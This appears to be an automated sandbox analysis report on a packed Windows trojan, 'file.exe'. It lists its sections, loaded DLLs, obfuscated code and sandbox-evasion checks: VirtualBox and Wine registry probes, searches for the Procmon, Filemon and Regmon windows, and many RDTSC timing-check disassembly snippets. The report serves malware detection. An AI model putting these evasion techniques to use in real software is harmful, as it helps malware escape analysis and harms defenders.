Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075DE59
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_006FA627
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_006AA639
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00761610
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_006A475B
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00742740
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 003A4A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: bvkzsckp ZLIB complexity 0.9949526579483695
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_003C3A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_003BCAE0
Source: C:\Users\user\Desktop\file.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2N9DECTF.htm
Source: C:\Users\user\Desktop\file.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe; String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe; Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe; Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
              Source: file.exeStatic file information: File size 1801728 > 1048576
              Source: file.exeStatic PE information: Raw size of bvkzsckp is bigger than: 0x100000 < 0x19e000

              Data Obfuscation

              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bvkzsckp:EW;wpxlzhew:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bvkzsckp:EW;wpxlzhew:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C6390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c41a7 should be: 0x1ba7c6
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: bvkzsckp
              Source: file.exeStatic PE information: section name: wpxlzhew
              Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_007F9877 push 53CC1ED9h; mov dword ptr [esp], esi 0_2_007F9898
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0081C08B push 6F3F86BBh; mov dword ptr [esp], esi 0_2_0081C0A0
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_007FA04D push ecx; mov dword ptr [esp], 132F791Eh 0_2_007FA07C
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_007FA04D push ecx; mov dword ptr [esp], ebp 0_2_007FA0D6
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_007FA04D push 2ACD2504h; mov dword ptr [esp], ebx 0_2_007FA198
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008188B8 push 0EC53120h; mov dword ptr [esp], edx 0_2_008188D7
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00A310E6 push edx; mov dword ptr [esp], ecx 0_2_00A3111C
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0078002B push 7297C4E7h; mov dword ptr [esp], ebp 0_2_007800D0
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0078002B push eax; mov dword ptr [esp], ebp 0_2_0078016F
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0078C020 push 776AB19Eh; mov dword ptr [esp], esi 0_2_0078C044
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0078C020 push edx; mov dword ptr [esp], edi 0_2_0078C0E2
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F push 3590226Dh; mov dword ptr [esp], eax 0_2_0075A83A
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F push edi; mov dword ptr [esp], ebp 0_2_0075A8C7
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F push 7650A7CEh; mov dword ptr [esp], edi 0_2_0075A97B
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F push edi; mov dword ptr [esp], ebx 0_2_0075AA0E
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F push esi; mov dword ptr [esp], edx 0_2_0075AAD1
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_0075A82F push eax; mov dword ptr [esp], esi 0_2_0075AB5F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 0930FA61h; mov dword ptr [esp], edi0_2_0075AB73
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push eax; mov dword ptr [esp], 7EEF0902h0_2_0075AB77
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebx; mov dword ptr [esp], 49043933h0_2_0075ABF3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 29CD22B8h; mov dword ptr [esp], eax0_2_0075AC9B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 1A283E76h; mov dword ptr [esp], edi0_2_0075ADD4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebp; mov dword ptr [esp], ecx0_2_0075AE69
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 3266154Dh; mov dword ptr [esp], ebx0_2_0075AEB6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 0E013E59h; mov dword ptr [esp], ebx0_2_0075AED4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebx; mov dword ptr [esp], 5BFC93E8h0_2_0075AF00
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebp; mov dword ptr [esp], 2663EE7Ah0_2_0075AF4E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ecx; mov dword ptr [esp], 4358BB07h0_2_0075AF97
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push edx; mov dword ptr [esp], 7A137CD4h0_2_0075AFA9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push 63C2366Bh; mov dword ptr [esp], ebx0_2_0075AFF7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F push ebx; mov dword ptr [esp], ecx0_2_0075B036
              Source: file.exeStatic PE information: section name: bvkzsckp entropy: 7.954205119392446

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_003C6390

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5F0412 second address: 5EFC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F292CD152F1h 0x0000000c nop 0x0000000d add dword ptr [ebp+122D18F0h], edx 0x00000013 push dword ptr [ebp+122D169Dh] 0x00000019 js 00007F292CD152ECh 0x0000001f mov dword ptr [ebp+122D1A7Ch], eax 0x00000025 call dword ptr [ebp+122D2B67h] 0x0000002b pushad 0x0000002c jnl 00007F292CD152F0h 0x00000032 xor eax, eax 0x00000034 jmp 00007F292CD152F0h 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d mov dword ptr [ebp+122D318Bh], edi 0x00000043 mov dword ptr [ebp+122D3B33h], eax 0x00000049 mov dword ptr [ebp+122D3442h], eax 0x0000004f cmc 0x00000050 mov esi, 0000003Ch 0x00000055 jng 00007F292CD152EEh 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f js 00007F292CD152ECh 0x00000065 mov dword ptr [ebp+122D318Bh], ecx 0x0000006b lodsw 0x0000006d cmc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F292CD152ECh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D30E3h], ebx 0x00000081 nop 0x00000082 jg 00007F292CD152F0h 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c pushad 0x0000008d popad 0x0000008e jp 00007F292CD152E6h 0x00000094 popad 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 769B03 second address: 769B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F292CD65AA6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F292CD65AA6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 769B18 second address: 769B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 769DE0 second address: 769E07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AADh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F292CD65AAEh 0x00000011 pop ebx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 769F64 second address: 769F8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F292CD152EAh 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F292CD152ECh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 769F8A second address: 769F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 769F8E second address: 769F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76A0E1 second address: 76A0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76A0E5 second address: 76A113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F292CD152F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F292CD152F7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76A113 second address: 76A128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F292CD65AACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76CF65 second address: 76CF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D11A second address: 76D120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D120 second address: 76D125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D125 second address: 76D189 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F292CD65AA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jl 00007F292CD65ABDh 0x00000017 jmp 00007F292CD65AB7h 0x0000001c pop edx 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jmp 00007F292CD65AACh 0x00000025 jne 00007F292CD65AB7h 0x0000002b jmp 00007F292CD65AB1h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 jne 00007F292CD65ABBh 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D246 second address: 76D24A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D24A second address: 76D2BE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F292CD65AA8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 call 00007F292CD65AAAh 0x00000029 xor edx, dword ptr [ebp+122D3A87h] 0x0000002f pop ecx 0x00000030 push 00000000h 0x00000032 jbe 00007F292CD65AB2h 0x00000038 jo 00007F292CD65AACh 0x0000003e mov dword ptr [ebp+122D18F0h], ecx 0x00000044 call 00007F292CD65AA9h 0x00000049 jmp 00007F292CD65AB1h 0x0000004e push eax 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D2BE second address: 76D2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D2C2 second address: 76D2F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F292CD65AB7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D2F5 second address: 76D2FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D2FB second address: 76D301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D301 second address: 76D39A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jo 00007F292CD152F8h 0x00000013 push ebx 0x00000014 jmp 00007F292CD152F0h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e jg 00007F292CD152EEh 0x00000024 pop eax 0x00000025 mov dword ptr [ebp+122D1913h], ecx 0x0000002b push 00000003h 0x0000002d xor edi, dword ptr [ebp+122D2044h] 0x00000033 mov edi, 1FBE1FB5h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1A00h], edi 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F292CD152E8h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c or dword ptr [ebp+122D19A6h], edx 0x00000062 push B27F8246h 0x00000067 pushad 0x00000068 push ebx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D42B second address: 76D42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D42F second address: 76D435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D435 second address: 76D4A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F292CD65AB0h 0x0000000f nop 0x00000010 pushad 0x00000011 mov dword ptr [ebp+122D30E3h], ebx 0x00000017 mov cx, 3AB2h 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F292CD65AA8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push edx 0x00000039 mov dl, 71h 0x0000003b pop esi 0x0000003c call 00007F292CD65AA9h 0x00000041 push eax 0x00000042 push edx 0x00000043 push esi 0x00000044 pushad 0x00000045 popad 0x00000046 pop esi 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D4A1 second address: 76D4BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD152E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007F292CD152E6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D4BA second address: 76D4CE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F292CD65AA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D4CE second address: 76D4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F292CD152ECh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D4E5 second address: 76D583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007F292CD65AABh 0x00000010 pop eax 0x00000011 xor cx, DBF0h 0x00000016 push 00000003h 0x00000018 mov dword ptr [ebp+122D323Fh], eax 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F292CD65AA8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov esi, dword ptr [ebp+122D3AEBh] 0x00000040 mov dword ptr [ebp+122D2AADh], ebx 0x00000046 push 00000003h 0x00000048 mov cx, 466Ah 0x0000004c push 70BB4B49h 0x00000051 pushad 0x00000052 pushad 0x00000053 jmp 00007F292CD65AB9h 0x00000058 jmp 00007F292CD65AB3h 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F292CD65AB3h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D583 second address: 76D5AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 4F44B4B7h 0x0000000e jnc 00007F292CD152ECh 0x00000014 lea ebx, dword ptr [ebp+12450EABh] 0x0000001a mov edi, 65030B0Bh 0x0000001f xchg eax, ebx 0x00000020 push ebx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D5AD second address: 76D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F292CD65AA6h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D5C0 second address: 76D5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76D5C4 second address: 76D5CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E036 second address: 77E04A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E04A second address: 77E04F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E04F second address: 77E05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E05D second address: 77E066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E066 second address: 77E06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E06A second address: 77E06E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78DB62 second address: 78DB78 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F292CD152E6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jne 00007F292CD152E6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78BE2F second address: 78BE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F292CD65AACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78BF9E second address: 78BFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78BFA4 second address: 78BFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78BFA8 second address: 78BFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78C3DC second address: 78C3E6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F292CD65AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78C8F5 second address: 78C920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F292CD152E6h 0x0000000a jng 00007F292CD152E6h 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007F292CD152F4h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D4D0 second address: 78D4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F292CD65AAAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78D4DF second address: 78D4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007F292CD152E6h 0x0000000c rdtsc
